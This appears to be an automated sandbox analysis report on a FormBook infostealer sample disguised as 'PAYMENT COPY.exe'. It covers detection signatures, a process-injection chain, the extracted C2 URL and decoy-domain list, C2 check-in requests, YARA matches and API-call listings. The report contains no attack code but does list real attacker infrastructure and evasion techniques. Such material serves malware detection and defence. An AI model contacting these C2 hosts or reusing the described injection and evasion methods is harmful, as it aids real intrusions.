
Analysis Report PAYMENT COPY.exe

Overview

General Information

Sample Name: PAYMENT COPY.exe
Analysis ID: 385291
MD5: 0cdbfdf044cfa1d810ed06b745ac9cd9
SHA1: 124e5c370a103888227112141ea559b85ae17656
SHA256: 8d85a4dbf755253e9f46aafa65f5374431e5843e6d1fa6ab61ef238919d9f6bb
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PAYMENT COPY.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 0CDBFDF044CFA1D810ED06B745AC9CD9)
    • PAYMENT COPY.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 0CDBFDF044CFA1D810ED06B745AC9CD9)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6856 cmdline: /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cursosdigitaisbr.com/eqas/"], "decoy": ["elitereliableservices.com", "mmidyat.com", "undergroundtreehouserecords.com", "kakavjesajt.com", "rainbowrichesonlineslots.com", "sportfest40.com", "doubletc.pro", "foothillvbc.com", "bergvarme-installasjon.com", "mural.institute", "thewanderingflamingo.com", "teacherautomation.com", "sunberry.icu", "sebastian249.com", "cjaccessories.net", "cantonpod.com", "successshogi.xyz", "labsaguniminuto.com", "trancetherapysessions.com", "beyoncos.com", "agasete.com", "mg-izkerr8.net", "theonyxaffect.com", "modala.net", "boardgameschronicle.com", "ateliemundodaju.com", "llmav.xyz", "friedlinefamily.com", "whizzx.com", "leadingbusinessstrategies.com", "holidayspreesweepstakes.com", "nescleanups.com", "byyann.com", "cupidwealthmanagement.com", "exactcoach.site", "35efb510815e.com", "cablepd.com", "brokearchives.com", "spazio-living.com", "quantize.fund", "mexicoaprende.online", "mireiaclua.com", "360caiyin.com", "sharprenovationsusa.com", "yomeformo.online", "onebasketball.team", "planchadoraautomatica.com", "huaguoxianflushing.com", "misskarenwnglishteacher.com", "pasta-pop.com", "kuihua0101.com", "gabrielesantoro.com", "healthtransformationnetwork.com", "comicexplosion.com", "ebikestore.online", "luewhhedre.com", "xn--vensmasajsalonu-1vb.com", "cazataxservices.com", "hotelmanagementtech.com", "curiget.xyz", "greenviewholidays.com", "casinobetdeals.com", "stripepayment.online", "shelfcorpsale.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
(19 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author
2.1.PAYMENT COPY.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.PAYMENT COPY.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.1.PAYMENT COPY.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
2.2.PAYMENT COPY.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.PAYMENT COPY.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: www.cursosdigitaisbr.com/eqas/ | Avira URL Cloud: Label: malware
Source: http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (the configuration shown under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PAYMENT COPY.exe | Virustotal: Detection: 32%
Source: PAYMENT COPY.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.1.PAYMENT COPY.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.msdt.exe.51e7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.msdt.exe.e45378.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.PAYMENT COPY.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: PAYMENT COPY.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL | source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: PAYMENT COPY.exe, 00000001.00000003.335333892.000000001F140000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PAYMENT COPY.exe, msdt.exe
Source: Binary string: msdt.pdb | source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.cursosdigitaisbr.com/eqas/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.llmav.xyz
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.cjaccessories.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.sportfest40.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.kakavjesajt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.cursosdigitaisbr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.llmav.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.35efb510815e.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1 | Host: www.beyoncos.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | DNS traffic detected: queries for: www.cjaccessories.net
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: httpv2(13.12) | Date: Mon, 12 Apr 2021 07:46:25 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: hex-encoded HTML body of the 404 page, omitted here
Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | String found in binary or memory: http://181ue.com/sq.html?entry=
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?
Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | String found in binary or memory: https://www.8dq98.com/enter/index.html
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: PAYMENT COPY.exe, 00000001.00000002.341477540.0000000000A0A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same memory dumps and unpacked PEs listed under AV Detection above

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)
          Source: PAYMENT COPY.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: PAYMENT COPY.exe
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19560 NtWriteFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B196D0 NtCreateKey,
